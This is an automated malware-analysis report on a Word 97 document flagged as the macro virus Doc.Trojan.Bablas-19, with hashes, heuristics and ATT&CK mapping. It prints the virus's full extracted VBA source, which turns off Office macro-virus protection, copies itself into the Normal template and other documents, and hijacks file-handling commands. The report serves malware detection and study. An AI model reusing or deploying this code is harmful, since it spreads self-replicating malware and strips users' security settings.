Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba42d87de16f6cf0…

MALICIOUS

Office (OLE)

60.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ce5d89e1033a5cdb8869f052b2a5473a SHA-1: a5dfeb455dc40d44fe8b5f09e97889dc438a529d SHA-256: ba42d87de16f6cf0785f10727b162a34e76a2c0d75e1256498af8c904c99eff1
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Document_Open, indicating malicious intent. The script attempts to disable security features and modify application settings, consistent with a macro-based threat. The ClamAV detection as 'Doc.Trojan.Bablas-19' further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Trojan.Bablas-19 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bablas-19
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
      Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
          "Private Sub Document_Open()" + vbCrLf + _
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6498 bytes
SHA-256: 26d03ec462354483eeadddd384ef84cd991f1a6b169af2583913ad67c66f4a47
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Cisi_Lupi v1.10.000


Attribute VB_Name = "Cisi_Lupi"
'Program kecil ini adalah virus,
'tetapi BUKAN yang akan merusak komputer
'anda, tapi, daripada M$Word ada kena virus
'lain yang ganas, maka lebih baik saya handle
'
'Hormat Saya,
'Syarif Lumintarjo
'<syarifl@bigfoot.com>'

Const DEBUG_MODE = False
Const virName = "Cisi_Lupi"

Function virVersion() As String
  virVersion = "1.10.000"
End Function

Sub ShowMessage()
  MsgBox "Thank's for Not Deleting Cisi_Lupi", vbOKOnly
End Sub

Sub CL_OpenSecurity()
  Options.SaveNormalPrompt = False
  Options.VirusProtection = False
  Options.SavePropertiesPrompt = False
End Sub

'Sub ToolsMacro()
    'Application.VBE.MainWindow.Visible = True
'End Sub

'Sub ViewVbCode()
    'ToolsMacro
'End Sub

'Sub FileTemplates()
    'ToolsMacro
'End Sub

'Sub HelpAbout()
'End Sub

Sub ToolsOptions()
  Options.SaveNormalPrompt = True
  Options.SavePropertiesPrompt = True
  Options.VirusProtection = True
  Dialogs(wdDialogToolsOptions).Show
  CL_OpenSecurity
End Sub

Sub ChangeCap()
On Error Resume Next
  Application.Caption = "Micro$oft Word"
  ActiveWindow.Caption = ActiveDocument.Name
End Sub

Sub RestoreCap()
On Error Resume Next
  Application.Caption = "Bappebti Microsoft Word"
  ActiveWindow.Caption = ActiveDocument.Name
End Sub

Sub CL_ResetSettings()
  KeyBindings.ClearAll
  On Error Resume Next
  For Each Obj In CommandBars
    Obj.reset
  Next Obj
  Options.CheckGrammarAsYouType = False
  Options.CheckSpellingAsYouType = False
  Options.CheckGrammarWithSpelling = False
  Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
End Sub

Sub CL_ThisDocumentWriter(pkg)
  Set cm = pkg.VBProject.VBComponents(1).CodeModule
  s = "'Cisi_Lupi" + vbCrLf + _
      "Private Sub Document_Close()" + vbCrLf + _
      "TD_DocClose" + vbCrLf + _
      "End Sub" + vbCrLf + _
      "Private Sub Document_New()" + vbCrLf + _
      "TD_DocNew" + vbCrLf + _
      "End Sub" + vbCrLf + _
      "Private Sub Document_Open()" + vbCrLf + _
      "TD_DocOpen" + vbCrLf + _
      "End Sub"
  cm.AddFromString "'Cisi_Lupi v" + virVersion + vbCrLf
End Sub

Function CL_ClearComps(Direction) As Boolean

  Select Case Direction
    Case 1: Set Package = Application.NormalTemplate
    Case 2: Set Package = Application.ActiveDocument
    Case Else
      Exit Function
  End Select
  
  Set Comps = Package.VBProject.VBComponents
  Comps(1).CodeModule.DeleteLines 1, Comps(1).CodeModule.CountOfLines
  IsOk = False
    
  For Each Obj In Comps
    If Obj.Name = virName Then IsOk = True
    If Obj.Name = "ThisDocument" Then CL_ThisDocumentWriter Package
    If Obj.Name <> virName And Obj.Name <> "ThisDocument" Then
      Application.OrganizerDelete _
        Source:=Package.FullName, _
        Name:=Obj.Name, _
        Object:=wdOrganizerObjectProjectItems
    End If
  Next Obj

  CL_ClearComps = IsOk
  
End Function

Sub CL_OrgCopy(CompName, Direction)
On Error Resume Next
  Select Case Direction
    Case 1 'NormalTemplate to ActiveDocument
    If DEBUG_MODE Then MsgBox NormalTemplate.FullName + " >> " + ActiveDocument.FullName
    Application.OrganizerCopy _
      Source:=NormalTemplate.FullName, _
      Destination:=ActiveDocument.FullName, _
      Name:=CompName, _
      Object:=wdOrganizerObjectProjectItems
    Case 2 'ActiveDocument to NormalTemplate
    If DEBUG_MODE Then MsgBox ActiveDocument.FullName + " >> " + NormalTemplate.FullName
    Application.OrganizerCopy _
      Source:=ActiveDocument.FullName, _
      Destination:=NormalTemplate.FullName, _
      Name:=CompName, _
      Object:=wdOrganizerObjectProjectItems
  End Select
End Sub

Sub TemClearComponents()
  IsOk = CL_ClearComps(1)
  If Not IsOk Then CL_OrgCopy virName, 2
  CL_ResetSettings
End Sub

Sub DocClearComponents()
  IsOk = CL_ClearComps(2)
  If Not IsOk Then CL_OrgCopy virName, 1
  CL_ResetSettings
End Sub

Sub AutoExit()
  If DEBUG_MODE Then MsgBox "AutoExit()"
  ShowMessage
  Application.Quit
End Sub

Sub FileOpen()
  If DEBUG_MODE Then MsgBox "FileOpen()"
  ChangeCap
  WordBasic.DisableAutoMacros True
  On Error Resume Next
  If Dialogs(wdDialogFileOpen).Show <> 0 Then
    DocClearComponents
    ActiveDocument.Save
  End If
  RestoreCap
  WordBasic.DisableAutoMacros False
End Sub

Sub AutoOpen()
  If DEBUG_MODE Then MsgBox "AutoOpen()"
  CL_OpenSecurity
  ChangeCap
  TemClearComponents
  On Error Resume Next
  NormalTemplate.Save
  RestoreCap
End Sub

Sub AutoClose()
  If DEBUG_MODE Then MsgBox "AutoClose()"
  DocClearComponents
  ActiveWindow.Close
End Sub

Sub FileClose()
  If DEBUG_MODE Then MsgBox "FileClose()"
  AutoClose
End Sub

Sub FileSave()
  If DEBUG_MODE Then MsgBox "FileSave()"
  If ActiveDocument.Saved = False Then
    DocClearComponents
    TemClearComponents
    On Error Resume Next
    ActiveDocument.Save
    ActiveDocument.Saved = True
  End If
End Sub

Sub AutoExec()
  If DEBUG_MODE Then MsgBox "AutoExec()"
  WordBasic.DisableAutoMacros True
  CL_OpenSecurity
  Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
End Sub

Sub TD_DocOpen()
  MsgBox "TD_DocOpen"
End Sub

Sub TD_DocClose()
  MsgBox "TD_DocClose"
End Sub

Sub TD_DocNew()
  MsgBox "TD_DocNew"
End Sub

Sub Demolish()
On Error Resume Next
  C = Documents.Count
  If C <> 0 Then
    Normal.Cisi_Lupi.DocClearComponents
    WordBasic.DisableAutoMacros False
    If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
  Else
    Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
  End If
End Sub

Function CL_FindVBComponent(vbp, ComponentName) As Integer
  isFound = False
  i = 1
  For Each Obj In vbp.VBComponents
    isFound = (Obj.Name = ComponentName)
    If isFound Then Exit For
    i = i + 1
  Next Obj
  If isFound Then CL_FindVBComponent = i Else CL_FindVBComponent = -1
End Function

Function CL_GetVersion(vbc) As Integer
  s = vbc.CodeModule.Lines(1, 1)
  If s <> "" Then s = Right(s, Len(s) - 1)
  CL_GetVersion = Val(s)
End Function